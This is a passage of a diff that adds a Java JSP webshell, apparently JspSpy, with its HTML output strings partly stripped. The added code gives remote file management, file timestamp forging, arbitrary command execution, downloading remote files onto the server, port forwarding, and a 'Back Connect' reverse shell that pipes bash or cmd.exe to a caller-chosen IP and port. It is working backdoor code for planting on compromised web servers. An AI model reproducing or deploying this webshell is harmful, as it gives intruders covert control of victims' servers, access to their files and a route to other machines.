(String)(JSession.getAttribute(ENTER_CURRENT_DIR)); +} +file = new EnterFile(path); +((EnterFile)file).setZf((String)enter); +JSession.setAttribute(ENTER_CURRENT_DIR,path); +} else { +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +file = new File(path); +} +path2View = Util.convertPath(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
"); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

"); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Current Directory
"+ +"
"); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (int i = 0;i"+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
"+ +"
"+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
 NameLast ModifiedSizeRead/Write/Execute 
=Goto Parent
0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow"); +if (enter != null) +out.println(" "); +else +out.println("Del | Move | Pack"); +out.println("
"+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / unknow "+ +"Edit | "+ +"Down | "+ +"Copy"); +if (enter == null ) { +out.println(" | Move | "+ +"Property | "+ +"Enter"); +if (f.getName().endsWith(".zip") || f.getName().endsWith(".jar")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +} +out.println("
 "); +if (enter != null) +out.println("Pack Selected - Delete Selected"); +else +out.println("Pack Selected - Delete Selected"); +out.println(""+dircount+" directories / "+filecount+" files
"); +out.println("
"); +if (file instanceof EnterFile) +((EnterFile)file).close(); +} catch (ZipException e) { +JSession.setAttribute(MSG,"\""+JSession.getAttribute(ENTER).toString()+"\" Is Not a Zip File. Please Exit."); +throw e; +} catch (Exception e) { +JSession.setAttribute(MSG,"File Does Not Exist Or You Dont Have Privilege."+BACK_HREF); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +((Invoker)ins.get("vLogin")).invoke(request,response,JSession); +} catch (ClassCastException e) { +JSession.invalidate(); +((Invoker)ins.get("vLogin")).invoke(request,response,JSession); +} catch (Exception e) { + +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +File f = new File(JSession.getAttribute(CURRENT_DIR)+"/"+fileBean.getFileName()); +if (f.exists() && f.length() > 0) +JSession.setAttribute(MSG,"Upload File Success!"); +else +JSession.setAttribute("MSG","Upload File Failed!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +InputStream in = null; +Object enter = JSession.getAttribute(ENTER); +if (enter == null) +in = new FileInputStream(new File(src)); +else { +ZipFile zf = new ZipFile((String)enter); +ZipEntry entry = zf.getEntry(src); +in = zf.getInputStream(entry); +} +BufferedInputStream input = new BufferedInputStream(in); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { +output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
Copyright (C) 2010 http://www.Forjj.com/  [T00ls.Net] All Rights Reserved."+ +"
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
"+ +"
"+ +"

Create / Edit File »

"+ +""+ +"

Current File (import new file name and new file)
"+ +"

"+ +"

File Content

"+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String charset = request.getParameter("charset"); +Object enter = JSession.getAttribute(ENTER); +InputStream input = null; +if (enter != null) { +ZipFile zf = new ZipFile((String)enter); +ZipEntry entry = new ZipEntry(path); +input = zf.getInputStream(entry); +} else { +File f = new File(path); +if (!f.exists()) +return; +input = new FileInputStream(path); +} + +BufferedReader reader = null; +if (Util.isEmpty(charset) || charset.equals("ANSI")) +reader = new BufferedReader(new InputStreamReader(input)); +else +reader = new BufferedReader(new InputStreamReader(input,charset)); +StringBuffer content = new StringBuffer(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
"+ +"
"+ +"

Create / Edit File »

"+ +""+ +"

Current File (import new file name and new file)
"+ +"

"+ +"

File Content

"+ +"

"); +if (enter != null) +out.println(""); +else +out.println(""); +out.println("

"+ +"
"+ +"
"); + +} catch (Exception e) { + +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); +String charset = request.getParameter("charset"); +BufferedWriter outs = null; +if (charset.equals("ANSI")) +outs = new BufferedWriter(new FileWriter(new File(path))); +else +outs = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(path)),charset)); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File "+(new File(path)).getName()+" With "+charset+" Success!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); + +out.println("
"+ +"
"+ +"

Set File Property »

"+ +"

Current File (FullPath)

"+ +" "+ +"

"+ +" Read "+ +" Write "+ +"

"+ +"

Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

"+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; + +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); + +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) { +if (ISLINUX) +cmd = "id"; +else +cmd = "cmd.exe /c set"; +} +if (program == null) +program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
"+ +"
"+ +"

Execute Program »

"+ +"

"+ +""+ +""+ +"Parameter
"+ +""+ +"

"+ +"
"+ +"
"+ +"

Execute Shell »

"+ +"

"+ +""+ +""+ +"Parameter
"+ +""+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +((Invoker)ins.get("vs")).invoke(request,response,JSession); +out.println("
"); +out.println("
");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+reader = new BufferedReader(new InputStreamReader(pro.getErrorStream()));
+s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println("
"); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +((Invoker)ins.get("vs")).invoke(request,response,JSession); +} +} +} catch (Exception e) { + +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +InputStream i = null; +Object enter = JSession.getAttribute(ENTER); +String fileName = null; +if (enter == null) { +File f = new File(path); +if (!f.exists()) +return; +fileName = f.getName(); +i = new FileInputStream(f); +} else { +ZipFile zf = new ZipFile((String)enter); +ZipEntry entry = new ZipEntry(path); +fileName = entry.getName().substring(entry.getName().lastIndexOf("/") + 1); +i = zf.getInputStream(entry); +} +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(fileName,PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(i); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { + +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.forjj.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
"+ +"
"+ +"

Remote File DownLoad »

"+ +"

"+ +""+ +"

File   URL: "+ +"

"+ +"

Save Path: "+ +"

"+ +""+ +"

"+ +"
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); + +File tempF = new File(savePath); +File saveF = tempF; +if (tempF.isDirectory()) { +String fName = downFileUrl.substring(downFileUrl.lastIndexOf("/")+1); +saveF = new File(tempF,fName); +} +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(saveF)); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +((Invoker)ins.get("vd")).invoke(request,response,JSession); +} catch (Exception e) { + +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +((Invoker)ins.get("filelist")).invoke(request,response,JSession); +} catch (Exception e) { + +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +private static class MoveInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String src = request.getParameter("src"); +String target = request.getParameter("to"); +if (!Util.isEmpty(target) && !Util.isEmpty(src)) { +File file = new File(src); +if(file.renameTo(new File(target))) { +JSession.setAttribute(MSG,"Move File Success!"); +} else { +String msg = "Move File Failed!"; +if (file.isDirectory()) { +msg += "The Move Will Failed When The Directory Is Not Empty."; +} +JSession.setAttribute(MSG,msg); +} +response.sendRedirect(SHELL_NAME); +} +} catch (Exception e) { + +throw e ; +} +} +} +private static class RemoveDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String dir = request.getParameter("dir"); +File file = new File(dir); +if (file.exists()) { +deleteFile(file); +deleteDir(file); +} + +JSession.setAttribute(MSG,"Remove Directory Success!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +public void deleteFile(File f) { +if (f.isFile()) { +f.delete(); +}else { +File[] list = f.listFiles(); +for (int i = 0;i"+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +"

Pack Configuration >>

"+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Packed Dir
Save To
Ext Filter"+ +" no Blacklist Whitelist"+ +"
"+ +"
Filesize Filter(KB) "+ +" no greaterthanlessthan
Exclude Dir
"+ +" "+ +"
"+ +"
" +); +} catch (Exception e) { + +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +private boolean config = false; +private String extFilter = "blacklist"; +private String[] fileExts = null; +private String sizeFilter = "no"; +private int filesize = 0; +private String[] exclude = null; +private String packFile = null; +private void reset(){ +this.config = false; +this.extFilter = "blacklist"; +this.fileExts = null; +this.sizeFilter = "no"; +this.filesize = 0; +this.exclude = null; +this.packFile = null; +} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String config = request.getParameter("config"); +if (!Util.isEmpty(config) && config.equals("true")) { +this.config = true; +this.extFilter = request.getParameter("extfilter"); +this.fileExts = request.getParameter("fileext").split(","); +this.sizeFilter = request.getParameter("sizefilter"); +this.filesize = Integer.parseInt(request.getParameter("filesize")); +this.exclude = request.getParameter("exclude").split(","); +} +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +this.packFile = packedFile; +String saveFileName = request.getParameter("savefilename"); +File saveF = null; +if (this.config) +saveF = new File(saveFileName); +else +saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = null; +String base = ""; +if (pF.isDirectory()) { +if (pF.listFiles().length == 0) { +JSession.setAttribute(MSG,"No File To Pack ! Maybe The Directory Is Empty ."); +response.sendRedirect(SHELL_NAME); +this.reset(); +return; +} +zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +zipDir(pF,base,zout); +} else { +zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +zipFile(pF,base,zout); +} +zout.close(); +this.reset(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +if (this.config) { +String curName = f.getAbsolutePath().replace('\\','/'); +curName = curName.replaceAll("\\Q"+this.packFile+"\\E",""); +if (this.exclude != null) { +for (int i = 0;i filesize) +return; +} +} +} +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"UnPack File Success!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); + +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); + +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.forjj.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); + +out.println("
"+ +""+ +" "+ +" "+ +" "+ +""+ +"

PortMap >>

"+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"

Local Ip :"+ +" "+ +" 		Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

"+ +" "+ +" "+ +"
"+ +"
"+ +"
"+ +"
"); +String targetIP = request.getParameter("targetIP"); +String targetPort = request.getParameter("targetPort"); +String yourIP = request.getParameter("yourIP"); +String yourPort = request.getParameter("yourPort"); +if (Util.isEmpty(targetIP)) +targetIP = "127.0.0.1"; +if (Util.isEmpty(targetPort)) +targetPort = "3389"; +if (Util.isEmpty(yourIP)) +yourIP = request.getRemoteAddr(); +if (Util.isEmpty(yourPort)) +yourPort = "53"; +out.println("
"+ +""+ +" "+ +" "+ +" "+ +""+ +"

Port Back >>

"+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"

Target Ip :"+ +" "+ +" 		Target Port :"+ +" Your Ip :"+ +" Your Port :"+ +"

"+ +" "+ +"
"+ +"
"+ +"
"+ +"
"); +} catch (Exception e) { + +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +((Invoker)ins.get("vmp")).invoke(request,response,JSession); +} catch (Exception e) { + +throw e ; +} +} +} +//PortBack +private static class PortBackInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String targetIP = request.getParameter("targetIP"); +String targetPort = request.getParameter("targetPort"); +String yourIP = request.getParameter("yourIP"); +String yourPort = request.getParameter("yourPort"); +Socket yourS = new Socket(); +yourS.connect(new InetSocketAddress(yourIP,Integer.parseInt(yourPort))); +Socket targetS = new Socket(); +targetS.connect(new InetSocketAddress(targetIP,Integer.parseInt(targetPort))); +StreamConnector.readFromLocal(new DataInputStream(targetS.getInputStream()),new DataOutputStream(yourS.getOutputStream())); +StreamConnector.readFromRemote(targetS,yourS,new DataInputStream(yourS.getInputStream()),new DataOutputStream(targetS.getOutputStream())); +JSession.setAttribute("done","Port Back Success !"); +((Invoker)ins.get("vmp")).invoke(request,response,JSession); +} catch (Exception e) { + +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); +remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +StreamConnector.readFromLocal(localIn,remoteOut); +StreamConnector.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} + +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +JSession.setAttribute(SESSION_O,"vmp"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); +JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "53"; +if (Util.isEmpty(program)) { +if (ISLINUX) +program = "/bin/bash"; +else +program = "cmd.exe"; +} + +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +""+ +"

Back Connect >>

"+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

"+ +" "+ +"
"+ +"
"+ +"
"+ +"
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(process.getErrorStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +JSession.setAttribute(SESSION_O,"vbc"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

System Properties >>

"+ +"
"+ +"
"+ +"
    "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
  • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
    • "); +} +out.println("

System Environment >>

    "); +/* + Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
  • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
    • "); +}*/ +out.println("
